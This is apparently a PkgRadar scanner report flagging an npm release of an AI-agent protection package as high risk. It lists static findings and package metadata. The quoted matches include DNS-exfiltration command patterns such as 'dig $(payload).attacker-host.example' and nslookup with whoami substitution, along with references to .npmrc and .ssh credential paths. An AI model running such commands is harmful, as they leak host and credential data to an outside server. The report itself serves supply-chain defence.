PkgRadar

Package evidence

@roxy-agent/[email protected]

DNS / OAST exfiltration: matched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("

Trust signals

Why this verdict

PkgRadar discounts a release’s score when public reputation argues against novel malware. The verdict above already reflects these — the panel just explains what was applied.

Weekly downloads
346
Versions published
14
First published
May 2026
Publisher
dwang88

Recommended action

Block this update

Static evidence trips multiple high-signal indicators. Quarantine the release until the publisher validates the change or you can rule out the indicators below.

Block this release in CIcurl · GitHub Actions

Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard.

curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["@roxy-agent/[email protected]"],"fail_on":"high"}'

GitHub Actions step:

- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["@roxy-agent/[email protected]"],"fail_on":"high"}'
Publisherdwang88
Artifact bytes139,443
Previous version0.5.4
Published2026-06-06T09:31:25.221Z
SHA-256e06545259f433642154a45c56740d74b302ba0344ab33077195478deba5ce7d7

Why flagged

What the scanner saw

DNS / OAST exfiltration: matched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("

Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.

Availability ledger

available

high
Last checked
highRisk
55Score
0.5.5Version
Status history (1 event)
  1. newavailable · risk high · score 55 · status changed

Evidence

Static findings

5 static · 0 from release diff · showing high-signal first.

SeverityKindPathDetailPoints
highDNS / OAST exfiltrationpackage/dist/ml/prototypes.jsmatched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("30
mediumCredential file accesspackage/dist/classifier.jsmatched ".npmrc"10
Show all 5 findings (low-signal and informational)
SeverityKindPathDetailPoints
highDNS / OAST exfiltrationpackage/dist/ml/prototypes.jsmatched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("30
mediumCredential file accesspackage/dist/classifier.jsmatched ".npmrc"10
lowMessenger Bot Endpointpackage/dist/dashboard/client.jsmatched "hooks.slack.com/services/" — messenger-bot URL without exfil context (likely a notification handler)5
lowCredential file accesspackage/dist/protection.jsmatched ".ssh/"5
lowCredential file accesspackage/dist/ml/prototypes.jsmatched ".ssh/"5

Manifest

Package metadata

Scripts7
  • buildnode scripts/clean-dist.mjs && tsc && node scripts/postbuild.mjs
  • devtsx src/index.ts
  • dev:watchtsx watch src/index.ts
  • prepacknpm run build
  • prepublishOnlynpm run build
  • startnode dist/index.js
  • typechecktsc --noEmit
Dependencies8
  • @huggingface/transformers^4.2.0
  • @modelcontextprotocol/sdk^1.29.0
  • axios^1.16.1
  • better-sqlite3^12.9.0
  • echarts^6.0.0
  • express^4.21.2
  • geist^1.7.0
  • zod^3.25.76